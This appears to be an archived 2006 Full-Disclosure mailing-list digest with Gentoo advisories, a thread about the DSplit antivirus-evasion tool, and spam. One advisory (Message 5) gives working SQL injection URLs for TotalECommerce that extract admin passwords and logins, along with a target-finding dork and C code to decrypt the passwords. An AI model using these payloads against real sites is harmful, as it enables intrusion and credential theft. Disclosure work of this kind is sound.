Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Full-Disclosure Digest, Vol 13, Issue 8
From: "DONNY MCCOY" <DMCCOY () bbl-inc com>
Date: Sun, 05 Mar 2006 07:01:03 -0500

I will be in Denver through Thursday and will return to Syracuse on
Friday.  I will check voicemail and e-mail periodically as time allows.

If your e-mail is urgent please contact the help desk in Syracuse at
x19511.

Thanks.

Donny

full-disclosure 03/05/06 07:00 >>>

Send Full-Disclosure mailing list submissions to
        full-disclosure () lists grok org uk

To subscribe or unsubscribe via the World Wide Web, visit
        https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
        full-disclosure-request () lists grok org uk

You can reach the person managing the list at
        full-disclosure-owner () lists grok org uk

When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."


Note to digest recipients - when replying to digest posts, please trim
your post appropriately. Thank you.


Today's Topics:

   1. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
   2. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
   3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
   4. [ GLSA 200603-01 ] WordPress: SQL injection       vulnerability
      (Thierry Carrez)
   5. Advisory: TotalECommerce (index.asp id) Remote    SQL Injection
      Vulnerability. (nukedx () nukedx com)
   6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in
      included XPdf code (Thierry Carrez)
   7. [ GLSA 200603-03 ] MPlayer: Multiple integer      overflows
      (Thierry Carrez)
   8. Please remove me from the list (W1nd man)
   9. Re: Please remove me from the list (Alexander Hristov)
  10. (no subject) (Steven Rakick)
  11. Re: (no subject) (Steven Rakick)
  12. Re: (no subject) (PERFECT.MATERIAL)
  13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)


----------------------------------------------------------------------

Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
        bugtraq () securityfocus com
Message-ID: <44098395.6010604 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
yeah already knowing they are most fucking bastards

Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module

On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit
is the small brother of an old tool known as UKsplitter wich is now
abandonned, does not work in vmware, fails to run under windows
2003.

DSplit has been coded for persons like me, targeted by AV firms and
 I'm not responsible of the bad uses of it, I recall this method is
known since a long time and it's up to the AV firms to review their
detections software.


http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
 http://getdsplit.class101.org

usual critics , flames, can be directly sent to the Recycle Bin :>

_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/


-- Best Regards, Aleksander Hristov < root at securitydot.net > <
http://securitydot.net >




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBRAmDlK+LRXunxpxfAQLmag/8D32IgYedMC/LKtfLKeNv/Dafq9i2NTKu
Hsns+6DpLvC5QlOUWUixfok2Nici4lp5dy/xF8D01tqgh3gKFnmv2u0dqjxj6w4K
VeZC2teXcYndCWrMDCX+3HFcT4+ZUjkMjGixAwnQhAuIsstQ5pP9pfOT+3PrZFeE
Li8IUqFzUL+sUkMhNeZm51mPF69nHeGTRYY9mKKploXeczCpH33EGjeMoDynwKwp
VPESww9avNd9AiCQ+bvE9Eeh1+kihcJwwyFfWqd64E4C3L85Cr+GqQ+EzQMp/ZmW
Bq4ETGD5En02DnHo8+S152VisipIKgWZpzlzgTlFTkyuDnh+aS5VH1ZJGoiMhONo
mNrDe45a3G2r6t3NA/PRJLocKrnrsXeGw7EqQ52GJ9sWrBXT+yJ/CbAZ6yg0ToVU
7zB8ggAsuedNKPCG3LZH/w5eDErFlG+c9pDzrvUv4NxR1BDRfPMlsSYcAR7zq9tf
q/I1fZO43hT3nSyukT8NNB1vN7S7J6Zw2Djh6jEjyPwefEnbFmd3Au1zF+tR6qX1
mkScSpoMgbJKcFkk8U2ZAskx18qHvkalKjnjbqxctigQ2sTf4FLtJlCwF5ux6Rld
Ko5Bs/yIdHr8b0l7r+v1Ek53P/BqtU+3QUC5y3maDSpK81VRlx3mI1Z3IWrrsUuA
KMruj3WAFys=
=+V3s
-----END PGP SIGNATURE-----



------------------------------

Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
        bugtraq () securityfocus com
Message-ID: <44098521.6010509 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect virus.



Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module

On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit
is the small brother of an old tool known as UKsplitter wich is now
abandonned, does not work in vmware, fails to run under windows
2003.

DSplit has been coded for persons like me, targeted by AV firms and
 I'm not responsible of the bad uses of it, I recall this method is
known since a long time and it's up to the AV firms to review their
detections software.


http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
 http://getdsplit.class101.org

usual critics , flames, can be directly sent to the Recycle Bin :>

_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/


-- Best Regards, Aleksander Hristov < root at securitydot.net > <
http://securitydot.net >




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
RDdNjcudUuw=
=iAHW
-----END PGP SIGNATURE-----



------------------------------

Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad () heapoverflow com" <ad () heapoverflow com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
        bugtraq () securityfocus com
Message-ID:
        <734063a30603040441v3beb90d5n7faab639859c8dd7 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

Well clamav is the best AV for no money and its very good developed
again for no money :)
On 3/4/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect virus.



Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module

On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit
is the small brother of an old tool known as UKsplitter wich is now
abandonned, does not work in vmware, fails to run under windows
2003.

DSplit has been coded for persons like me, targeted by AV firms and
 I'm not responsible of the bad uses of it, I recall this method is
known since a long time and it's up to the AV firms to review their
detections software.


http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
 http://getdsplit.class101.org

usual critics , flames, can be directly sent to the Recycle Bin :>

_______________________________________________ Full-Disclosure -
We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html Hosted and
sponsored by Secunia - http://secunia.com/


-- Best Regards, Aleksander Hristov < root at securitydot.net > <
http://securitydot.net >




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
RDdNjcudUuw=
=iAHW
-----END PGP SIGNATURE-----




--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net



------------------------------

Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection
        vulnerability
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
        security-alerts () linuxsecurity com
Message-ID: <4409B61B.5060903 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: WordPress: SQL injection vulnerability
      Date: March 04, 2006
      Bugs: #121661
        ID: 200603-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

WordPress is vulnerable to an SQL injection vulnerability.

Background
==========

WordPress is a PHP and MySQL based content management and publishing
system.

Affected packages
=================

    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-apps/wordpress      <= 1.5.2                         >= 2.0.1

Description
===========

Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comments posting. This vulnerability was already fixed in the
2.0-series of WordPress.

Impact
======

An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.

Workaround
==========

Disable or moderate comments on your WordPress blogs.

Resolution
==========

All WordPress users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/89aced5d/signature-0001.bin

------------------------------

Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx () nukedx com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id)
        Remote  SQL Injection Vulnerability.
To: submit () milw0rm com, full-disclosure () lists grok org uk,
        bugtraq () securityfocus com
Message-ID: <20060304162607.2lyie75fm1m4gwow () webmail nukedx com>
Content-Type: text/plain;       charset=ISO-8859-9

--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx () nukedx com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries
to id
parameter
in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and
with
example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact with vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18

---
Decrypter source in C
---
/*********************************************
*        TotalECommerce PWD Decrypter        *
*        Coded by |SaMaN| for nukedx         *
*          http://www.k9world.org            *
*              IRC.K9World.Org               *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
  char buf[255];
  char buf2[255];
  char buf3[255];
  char *texto;
  char *vcrypt;
  int i,x,z,t = 0;
  char saman;
  texto = buf;
  vcrypt = buf2;
  printf("%s", "|=------------------------------------=|\n");
  printf("%s", "   Coded by |SaMaN| @ IRC.K9World.Org\n");
  printf("%s", "|=------------------------------------=|\n\n");
  printf("%s", "Enter crypted password: ");
  scanf("%200s", buf);
  if (!texto)
  vcrypt = "";

  for (i = 0; i < strlen(texto); i++)
  {
    if ((vcrypt == "") || (i > strlen(texto)))
    x = 1;
    else
    x = x + 1;
    t = buf[i];
    z = 255 - t;
    saman = toascii(z);
    snprintf(buf3, 250, "%c", saman);
    strncat(buf2, buf3, 250);
  }
  printf("Result: %s\n", buf2);
  return;
}
---End of code---
Greets to: |SaMaN|



------------------------------

Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX:
        Multiple overflows in included XPdf code
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
        security-alerts () linuxsecurity com
Message-ID: <4409C122.4090103 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf
            code
      Date: March 04, 2006
      Bugs: #115775
        ID: 200603-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.

Background
==========

teTex is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is and ASCII publishing TeX distribution.

Affected packages
=================

    -------------------------------------------------------------------
     Package           /  Vulnerable  /                     Unaffected
    -------------------------------------------------------------------
  1  app-text/tetex       < 2.0.2-r8                       >= 2.0.2-r8
  2  app-text/cstetex     < 2.0.2-r2                       >= 2.0.2-r2
  3  app-text/ptex        < 3.1.5-r1                       >= 3.1.5-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

CSTeX, teTex, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).

Impact
======

An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All teTex users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"

All CSTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"

All pTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"

References
==========

  [ 1 ] CVE-2005-3193
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
  [ 2 ] GLSA 200512-08
        http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
  [ 3 ] CESA-2005-003
        http://scary.beasts.org/security/CESA-2005-003.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/5e29724b/signature-0001.bin

------------------------------

Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple
        integer overflows
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
        security-alerts () linuxsecurity com
Message-ID: <4409CDBA.8060405 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MPlayer: Multiple integer overflows
      Date: March 04, 2006
      Bugs: #115760, #122029
        ID: 200603-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.

Background
==========

MPlayer is a media player capable of handling multiple multimedia file
formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /    Vulnerable    /              Unaffected
    -------------------------------------------------------------------
  1  media-video/mplayer     < 1.0.20060217            >= 1.0.20060217

Description
===========

MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.

Impact
======

An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose
">=media-video/mplayer-1.0.20060217"

References
==========

  [ 1 ] CVE-2005-4048
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
  [ 2 ] CVE-2006-0579
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
  [ 3 ] GLSA 200601-06
        http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/568fbea3/signature-0001.bin

------------------------------

Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n () walla com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure () lists grok org uk>
Message-ID: <1141503369.961000-13997465-23441 () walla com>
Content-Type: text/plain; charset="us-ascii"

An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html

------------------------------

Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n () walla com>
Cc: full-disclosure () lists grok org uk
Message-ID:
        <734063a30603041752v7a8cc6efnd28861cae0f8be32 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure

On 3/4/06, W1nd man <w1ndm4n () walla com> wrote:



Please remove me from the list


________________________________

Walla! Mail - get your free 3G mail today
_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net



------------------------------

Message: 10
Date: Sat, 4 Mar 2006 18:01:51 -0800
From: Steven Rakick <stevenrakick () yahoo com>
Subject: [Full-disclosure] (no subject)
To: full-disclosure () lists grok org uk
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
Content-Type: text/plain; charset="iso-8859-1"

Hello HACKERZ!, 

Your personal DONGEZ to this message.

Sincerely, 
BanHaus manager

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f1416faf/attachment-0001.html

------------------------------

Message: 11
Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST)
From: Steven Rakick <stevenrakick () yahoo com>
Subject: Re: [Full-disclosure] (no subject)
To: full-disclosure () lists grok org uk
Message-ID: <20060305042832.34191.qmail () web53201 mail yahoo com>
Content-Type: text/plain; charset=iso-8859-1

Not that it matters but...

Received: from www.c0replay.net (unknown
[206.251.72.74])
        by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
        for <full-disclosure () lists grok org uk>;
        Sun,  5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


------------------------------

Message: 12
Date: Sun, 5 Mar 2006 00:34:03 -0500
From: PERFECT.MATERIAL <perfect.material () gmail com>
Subject: Re: [Full-disclosure] (no subject)
To: "Steven Rakick" <stevenrakick () yahoo com>
Cc: full-disclosure () lists grok org uk
Message-ID:
        <631ac1d90603042134n7a22e7aale14d2aa7914dda58 () mail gmail com>
Content-Type: text/plain; charset="iso-8859-1"

Dick Breath,

You should sign your electronic mail with some unhackable crypto
technology.  That way you will never need to show off your cut and paste
technology to the others.  You are irresponsible. Not that it matters
but...

PERFECT.MATERIAL


On 3/4/06, Steven Rakick <stevenrakick () yahoo com> wrote:

Not that it matters but...

Received: from www.c0replay.net (unknown
[206.251.72.74])
       by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
       for <full-disclosure () lists grok org uk>;
       Sun,  5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-------------- next part --------------
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060305/d547fd1e/attachment-0001.html

------------------------------

Message: 13
Date: Sun, 05 Mar 2006 13:34:43 +0800
From: Praburaajan <prabu () hackinthebox org>
Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers
To: full-disclosure () lists grok org uk,
        dailydave () lists immunitysec com,
        pen-test () securityfocus com,
        bugtraq () securityfocus com,   Voipsec () voipsa org,
submit () milw0rm com,
        webappsec () securityfocus com,         ipv6 () ietf org,
        security-basics () securityfocus com
Message-ID: <440A7873.4000202 () hackinthebox org>
Content-Type: text/plain; charset=windows-1252; format=flowed

Greetings from Hack in The Box -- We are pleased to announce that the
Call for Paper (CfP) for HITBSecConf2006 - Malaysia is now open! Set to
take place from September 18th - 21st 2006 at The Westin Kuala Lumpur,
this years conference promises to once again deliver an International
deep-knowledge security conference. HITBSecConf has been described as
"the most intimate of hacker gatherings" and is the largest network
security conference in Asia! 

SUBMISSION 

HITBSecConf is a deep-knowledge technical conference. Talks that are
more technical or that discuss new and never before seen attack methods
are of more interest than a subject that has been covered several times
before. Summaries not exceeding 250 words should be submitted (in plain
text format) to cfp -at- hackinthebox.org for review and possible
inclusion in the programme. 

Submissions are due no later than 1st of May 2006

TOPICS

Topics of interest include, but are not limited to the following:

* Analysis of network and security vulnerabilities
* Firewall technologies
* Intrusion detection
* Data Recovery and Incident Response
* GPRS, 3G and CDMA Security
* Identification and Entity Authentication
* Network Protocol and Analysis
* Smart Card Security
* Virus and Worms
* WLAN and Bluetooth Security.
* Analysis of malicious code
* Applications of cryptographic techniques,
* Analysis of attacks against networks and machines
* Denial-of-service attacks and countermeasures
* File system security
* Security in heterogeneous and large-scale environments
* Techniques for developing secure systems

PLEASE NOTE: We do not accept product or vendor related pitches. If your
talk involves an advertisement for a new product or service your company
is offering, please do not submit.

Your submission should include:

* Name, title, address, email and phone/contact number
* Draft of the proposed presentation (in PDF or PowerPoint format),
proof of concept for tools and exploits, etc.
* Short biography, qualification, occupation, achievement and
affiliations (limit 150 words).
* Summary or abstract for your presentation (limit 250 words)
* Time (45-60 minutes including time for discussion and questions)
* Technical requirements (video, internet, wireless, audio, etc.)

Each non-resident speaker will receive accommodation for 3 nights at The
Westin Kuala Lumpur. For each non-resident speaker, HITB will cover
travel expenses (through our airline partner, Malaysia Airlines) up to
USD 1,000.00. 

HITBSecConf2006 CTF Daemons/Flags

As part of our annual conference, HITB organizes an attack and defense
"hack-game" commonly referred to as *Capture The Flag* or CTF. As part
